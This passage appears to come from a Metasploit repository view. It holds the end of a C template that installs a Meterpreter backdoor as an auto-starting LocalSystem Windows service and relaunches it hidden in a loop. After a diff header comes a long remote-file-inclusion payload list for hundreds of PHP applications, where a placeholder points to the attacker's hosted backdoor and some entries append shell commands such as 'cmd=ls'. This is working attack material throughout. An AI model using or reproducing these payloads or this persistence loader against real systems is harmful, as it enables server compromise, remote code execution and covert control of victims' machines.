// If create process failed.
// CREATE_NO_WINDOW = 0x08000000
if (CreateProcess(path, path, NULL, NULL, TRUE, 0x08000000, NULL,
NULL, &startup_info, &process_information) == 0)
{
return;
}
// Wait until the process died.
WaitForSingleObject(process_information.hProcess, -1);
}
//
// Process control requests from the Service Control Manager
//
VOID WINAPI ServiceCtrlHandler(DWORD fdwControl)
{
switch (fdwControl) {
case SERVICE_CONTROL_STOP:
case SERVICE_CONTROL_SHUTDOWN:
status.dwWin32ExitCode = 0;
status.dwCurrentState = SERVICE_STOPPED;
break;
case SERVICE_CONTROL_PAUSE:
status.dwWin32ExitCode = 0;
status.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
status.dwWin32ExitCode = 0;
status.dwCurrentState = SERVICE_RUNNING;
break;
default:
break;
}
if (SetServiceStatus(hStatus, &status) == 0) {
//printf("Cannot set service status (0x%08x)", GetLastError());
exit(1);
}
return;
}
//
// Main function of service
//
VOID WINAPI ServiceMain(DWORD dwArgc, LPTSTR* lpszArgv)
{
// Register the service handler
hStatus = RegisterServiceCtrlHandler(SERVICE_NAME, ServiceCtrlHandler);
if (hStatus == 0) {
//printf("Cannot register service handler (0x%08x)", GetLastError());
exit(1);
}
// Initialize the service status structure
status.dwServiceType = SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS;
status.dwCurrentState = SERVICE_RUNNING;
status.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
status.dwWin32ExitCode = 0;
status.dwServiceSpecificExitCode = 0;
status.dwCheckPoint = 0;
status.dwWaitHint = 0;
if (SetServiceStatus(hStatus, &status) == 0) {
//printf("Cannot set service status (0x%08x)", GetLastError());
return;
}
// Start the Meterpreter
while (status.dwCurrentState == SERVICE_RUNNING) {
self_call();
Sleep(RETRY_TIME);
}
return;
}
//
// Installs and starts the Meterpreter service
//
BOOL install_service()
{
SC_HANDLE hSCManager;
SC_HANDLE hService;
char path[MAX_PATH];
// Get the current module name
if (!GetModuleFileName(NULL, path, MAX_PATH)) {
//printf("Cannot get module name (0x%08x)", GetLastError());
return FALSE;
}
// Build the service command line
char cmd[MAX_PATH];
int total_len = strlen(path) + <%= 3 + @start_cmd.length %>;
if (total_len < 0 || total_len >= sizeof(cmd)){
//printf("Cannot build service command line (0x%08x)", -1);
return FALSE;
}
cmd[0] = '\0';
strcat(cmd, "\"");
strcat(cmd, path);
strcat(cmd, "\" <%= @start_cmd %>");
// Open the service manager
hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
if (hSCManager == NULL) {
//printf("Cannot open service manager (0x%08x)", GetLastError());
return FALSE;
}
// Create the service
hService = CreateService(
hSCManager,
SERVICE_NAME,
DISPLAY_NAME,
0xf01ff, // SERVICE_ALL_ACCESS
SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_NORMAL,
cmd,
NULL,
NULL,
NULL,
NULL, /* LocalSystem account */
NULL
);
if (hService == NULL) {
//printf("Cannot create service (0x%08x)", GetLastError());
CloseServiceHandle(hSCManager);
return FALSE;
}
// Start the service
char* args[] = { path, "service" };
if (StartService(hService, 2, (const char**)&args) == 0) {
DWORD err = GetLastError();
if (err != 0x420) //ERROR_SERVICE_ALREADY_RUNNING
{
//printf("Cannot start service %s (0x%08x)", SERVICE_NAME, err);
CloseServiceHandle(hService);
CloseServiceHandle(hSCManager);
return FALSE;
}
}
// Cleanup
CloseServiceHandle(hService);
CloseServiceHandle(hSCManager);
//printf("Service %s successfully installed.", SERVICE_NAME);
return TRUE;
}
//
// Start the service
//
void start_service()
{
SERVICE_TABLE_ENTRY ServiceTable[] =
{
{ SERVICE_NAME, &ServiceMain },
{ NULL, NULL }
};
if (StartServiceCtrlDispatcher(ServiceTable) == 0) {
//printf("Cannot start the service control dispatcher (0x%08x)",GetLastError());
exit(1);
}
}
//
// Main function
//
int main()
{
// Parse the command line argument.
// For now, int main(int argc, char *argv) is buggy with metasm.
// So we choose this approach to achieve it.
LPTSTR cmdline;
cmdline = GetCommandLine();
char *argv[MAX_PATH];
char * ch = strtok(cmdline," ");
int argc = 0;
while (ch != NULL)
{
argv[argc] = malloc( strlen(ch)+1) ;
strncpy(argv[argc], ch, strlen(ch)+1);
ch = strtok (NULL, " ");
argc++;
}
if (argc > 1) {
if (strcmp(argv[argc-1], <%= @install_cmd.inspect %>) == 0) {
// Installs and starts the service
install_service();
return 0;
}
else if (strcmp(argv[argc-1], <%= @start_cmd.inspect %>) == 0) {
// Starts the Meterpreter as a service
start_service();
return 0;
}
}
// Starts the Meterpreter as a normal application
start_meterpreter();
return 0;
}
+2247 -2246
View File
@@ -1,2246 +1,2247 @@
# Compiled by RSnake 02/01/2010 Mostly from milw0rm osvdb.org and elsewhere.
# Change XXpathXX to the path of your backdoor. Note that you may need to
# try it against every directory on the target and because of how this was
# culled you may need to add a question mark to your own XXpathXX URL:
# Eg: XXpathXX => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=XXpathXX?
/123flashchat.php?e107path=XXpathXX
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX
/22_ultimate/templates/header.php?mainpath=XXpathXX?
/=XXpathXX
/?_CONFIG[files][functions_page]=XXpathXX
/?npage=-1&content_dir=XXpathXX%00&cmd=ls
/?npage=1&content_dir=XXpathXX%00&cmd=ls
/?show=XXpathXX?
/A-Blog/navigation/donation.php?navigation_start=XXpathXX
/A-Blog/navigation/latestnews.php?navigation_start=XXpathXX?
/A-Blog/navigation/links.php?navigation_start=XXpathXX?
/A-Blog/navigation/search.php?navigation_end=XXpathXX?
/A-Blog/sources/myaccount.php?open_box=XXpathXX?
/ACGVnews/header.php?PathNews=XXpathXX
/ATutor/documentation/common/frame_toc.php?section=XXpathXX
/ATutor/documentation/common/search.php?section=XXpathXX
/ATutor/documentation/common/vitals.inc.php?req_lang=XXpathXX
/ATutor/include/classes/module/module.class.php?row[dir_name]=XXpathXX
/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=XXpathXX
/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=XXpathXX?
/Administration/Includes/configureText.php?path_prefix=XXpathXX
/Administration/Includes/contentHome.php?path_prefix=XXpathXX
/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
/Administration/Includes/userHome.php?path_prefix=XXpathXX
/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=XXpathXX?
/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=XXpathXX?
/BE_config.php?_PSL[classdir]=XXpathXX
/BPNEWS/bn_smrep1.php?bnrep=XXpathXX?&
/Base/Application.php?pear_dir=XXpathXX
/Bcwb_PATH/dcontent/default.css.php?root_path_admin=XXpathXX
/Bcwb_PATH/include/startup.inc.php?root_path_admin=XXpathXX
/Bcwb_PATH/system/default.css.php?root_path_admin=XXpathXX
/Beautifier/Core.php?BEAUT_PATH=XXpathXX?
/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=XXpathXX
/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=XXpathXX
/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=XXpathXX?
/CheckUpload.php?Language=XXpathXX&cmd=ls
/Contenido_4.8.4/contenido/backend_search.php?contenido_path=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=XXpathXX?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=XXpathXX?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=XXpathXX?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=XXpathXX?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=XXpathXX?
/CoupleDB.php?Parametre=0&DataDirectory=XXpathXX?
/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=XXpathXX
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]XXpathXX
/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=XXpathXX
/DON3/applications/frontpage.don3app/frontpage.php?app_path=XXpathXX?
/Dir_phNNTP/article-raw.php?file_newsportal=XXpathXX?
/DynaTracker_v151/action.php?base_path=XXpathXX
/DynaTracker_v151/includes_handler.php?base_path=XXpathXX
/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=XXpathXX?
/Ex/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=XXpathXX?
/Exophpdesk_PATH/pipe.php?lang_file=XXpathXX
/FirstPost/block.php?Include=XXpathXX
/Flickrclient.php?path_prefix=XXpathXX
/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=XXpathXX?
/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=XXpathXX?
/Full_Release/include/body_comm.inc.php?content=XXpathXX
/Gallery/displayCategory.php?basepath=XXpathXX
/Include/lib.inc.php3?Include=XXpathXX?
/Include/variables.php3?Include=XXpathXX?
/Jobline/admin.jobline.php?mosConfig_absolute_path=XXpathXX
/ListRecords.php?lib_dir=XXpathXX?&cmd=id
/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=XXpathXX
/MOD_forum_fields_parse.php?phpbb_root_path=XXpathXX
/Mamblog/admin.mamblog.php?cfgfile=XXpathXX
/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=XXpathXX?
/NuclearBB/tasks/send_queued_emails.php?root_path=XXpathXX?
/OpenSiteAdmin/indexFooter.php?path=XXpathXX%00
/OpenSiteAdmin/pages/pageHeader.php?path=XXpathXX?
/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/FieldManager.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/Filter.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/Form.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/FormManager.php?path=XXpathXX%00
/OpenSiteAdmin/scripts/classes/LoginManager.php?path=XXpathXX%00
/PHP/includes/header.inc.php?root=XXpathXX?
/PHPDJ_v05/dj/djpage.php?page=XXpathXX?
/PaTh/index.php?rootpath=XXpathXX
/Path_Script/createurl.php?formurl=XXpathXX
/PhotoCart/adminprint.php?admin_folder=XXpathXX
/Picssolution/install/config.php?path=XXpathXX?
/RGboard/include/footer.php?_path[counter]=XXpathXX?
/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=XXpathXX?
/SQuery/lib/gore.php?libpath=XXpathXX
/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=XXpathXX?
/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=XXpathXX?
/ScriptPage/source/includes/load_forum.php?mfh_root_path=XXpathXX
/ScriptPath/footers.php?tinybb_footers=XXpathXX
/ScriptPath/index.php?page=XXpathXX
/Script_Path/config.inc.php?_path=XXpathXX?
/Scripts/app_and_readme/navigator/index.php?page=XXpathXX
/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=XXpathXX
/Somery/team.php?checkauth=XXpathXX
/Upload/install.php?skindir=XXpathXX
/Widgets/Base/Footer.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifContainer.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifRoot.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifRoot2.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifRoot3.php?sys_dir=XXpathXX
/Widgets/Base/widget.BifWarning.php?sys_dir=XXpathXX
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=XXpathXX?
/[path]/mybic_server.php?file=XXpathXX
/[path]/previewtheme.php?theme=1&inc_path=XXpathXX?cmd
/_administration/securite.php?cfg[document_uri]=XXpathXX
/_blogadata/include/struct_admin.php?incl_page=XXpathXX?
/_conf/_php-core/common-tpl-vars.php?admindir=XXpathXX
/_connect.php?root=XXpathXX
/_friendly/core/data/_load.php?friendly_path=XXpathXX
/_friendly/core/data/yaml.inc.php?friendly_path=XXpathXX
/_friendly/core/display/_load.php?friendly_path=XXpathXX
/_friendly/core/support/_load.php?friendly_path=XXpathXX
/_functions.php?prefix=XXpathXX
/_includes/settings.inc.php?approot=XXpathXX
/_theme/breadcrumb.php?rootBase=XXpathXX
/_wk/wk_lang.php?WK[wkPath]=XXpathXX
/abf_js.php?abs_pfad=XXpathXX?&cmd=id
/about.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/about.php?bibtexrootrel=XXpathXX?
/aboutinfo.php?bibtexrootrel=XXpathXX?
/acc.php?page=XXpathXX
/access/login.php?path_to_root=XXpathXX
/account.php?insPath=XXpathXX
/accsess/login.php?path_to_root=XXpathXX
/active/components/xmlrpc/client.php?c[components]=XXpathXX
/ad_main.php?_mygamefile=XXpathXX
/add.cgi.php?blog_theme=XXpathXX
/add_link.php?blog_theme=XXpathXX
/addpost_newpoll.php?addpoll=preview&thispath=XXpathXX
/addressbook.php?GLOBALS[basedir]=XXpathXX?
/addsite.php?returnpath=XXpathXX
/addvip.php?msetstr["PROGSDIR"]=XXpathXX
/adm/krgourl.php?DOCUMENT_ROOT=XXpathXX?
/adm/my_statistics.php?DOCUMENT_ROOT=XXpathXX?
/admin.loudmouth.php?mainframe=XXpathXX
/admin.php?Madoa=XXpathXX?
/admin.php?cal_dir=XXpathXX
/admin.php?env_dir=XXpathXX
/admin.php?lang=XXpathXX
/admin.php?page[path]=XXpathXX?&cmd=ls
/admin.php?submit=submit&form_include_template=XXpathXX
/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=XXpathXX?admin
/admin/ST_countries.php?include_path=XXpathXX?
/admin/ST_platforms.php?include_path=XXpathXX?
/admin/addentry.php?phpbb_root_path=XXpathXX?
/admin/addons/archive/archive.php?adminfolder=XXpathXX
/admin/admin.php?path=XXpathXX
/admin/admin.php?site_url=XXpathXX
/admin/admin_forgotten_password.php?root_folder_path=XXpathXX
/admin/admin_news_bot.php?root_path=XXpathXX?
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=XXpathXX
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=XXpathXX
/admin/admin_users.php?phpbb_root_path=XXpathXX
/admin/auth.php?xcart_dir=XXpathXX?
/admin/auth/secure.php?cfgProgDir=XXpathXX?
/admin/autoprompter.php?CONFIG[BASE_PATH]=XXpathXX
/admin/bin/patch.php?INSTALL_FOLDER=XXpathXX
/admin/catagory.php?language=XXpathXX
/admin/classes/pear/OLE/PPS.php?homedir=XXpathXX
/admin/classes/pear/OLE/PPS/File.php?homedir=XXpathXX
/admin/classes/pear/OLE/PPS/Root.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=XXpathXX
/admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=XXpathXX
/admin/code/index.php?load_page=XXpathXX
/admin/comment.php?config[installdir]=XXpathXX
/admin/common-menu.php?CONF[local_path]=XXpathXX
/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=XXpathXX?
/admin/config_settings.tpl.php?include_path=XXpathXX?&cmd=id
/admin/directory.php?config[installdir]=XXpathXX
/admin/doeditconfig.php?thispath=../includes&config[path]=XXpathXX
/admin/frontpage_right.php?loadadminpage=XXpathXX
/admin/header.php?loc=XXpathXX
/admin/inc/add.php?format_menue=XXpathXX
/admin/inc/change_action.php?format_menue=XXpathXX
/admin/include/common.php?commonIncludePath=XXpathXX?
/admin/include/header.php?repertoire=XXpathXX?
/admin/include/lib.module.php?mod_root=XXpathXX
/admin/includes/admin_header.php?level=XXpathXX?
/admin/includes/author_panel_header.php?level=XXpathXX?
/admin/includes/header.php?bypass_installed=1&secure_page_path=XXpathXX%00
/admin/includes/spaw/spaw_control.class.php?spaw_root=XXpathXX?
/admin/index.php?path_to_script=XXpathXX?&cmd=ls
/admin/index.php?pg=XXpathXX?
/admin/index.php?xtrphome=XXpathXX
/admin/index_sitios.php?_VIEW=XXpathXX
/admin/lib_action_step.php?GLOBALS[CLASS_PATH]=XXpathXX
/admin/login.php?absolute_path=XXpathXX
/admin/news.admin.php?path_to_script=XXpathXX?&cmd=ls
/admin/news.php?language=XXpathXX
/admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=XXpathXX
/admin/sendmsg.php?config[installdir]=XXpathXX
/admin/setup/level2.php?dir=XXpathXX
/admin/system/config/conf-activation.php?site_path=XXpathXX
/admin/system/include.php?skindir=XXpathXX
/admin/system/include.php?start=1&skindir=XXpathXX
/admin/system/menu/item.php?site_path=XXpathXX
/admin/system/modules/conf_modules.php?site_path=XXpathXX
/admin/templates/template_thumbnail.php?thumb_template=XXpathXX
/admin/testing/tests/0004_init_urls.php?init_path=XXpathXX?&
/admin/themes.php?config[installdir]=XXpathXX
/admin/tools/utf8conversion/index.php?path=XXpathXX?
/admin/user_user.php?language=XXpathXX
/admincp/auth/checklogin.php?cfgProgDir=XXpathXX
/admincp/auth/secure.php?cfgProgDir=XXpathXX
/adminhead.php?path[docroot]=XXpathXX
/admini/admin.php?INC=XXpathXX?
/admini/index.php?INC=XXpathXX?
/administrator/admin.php?site_absolute_path=XXpathXX?
/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_color/admin.color.php?mosConfig_live_site=XXpathXX?
/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=XXpathXX?
/administrator/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_events/admin.events.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=XXpathXX
/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/administrator/components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=XXpathXX
/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=XXpathXX
/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_jreactions/langset.php?comPath=XXpathXX?
/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=XXpathXX?
/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=XXpathXX?
/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=XXpathXX
/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=XXpathXX
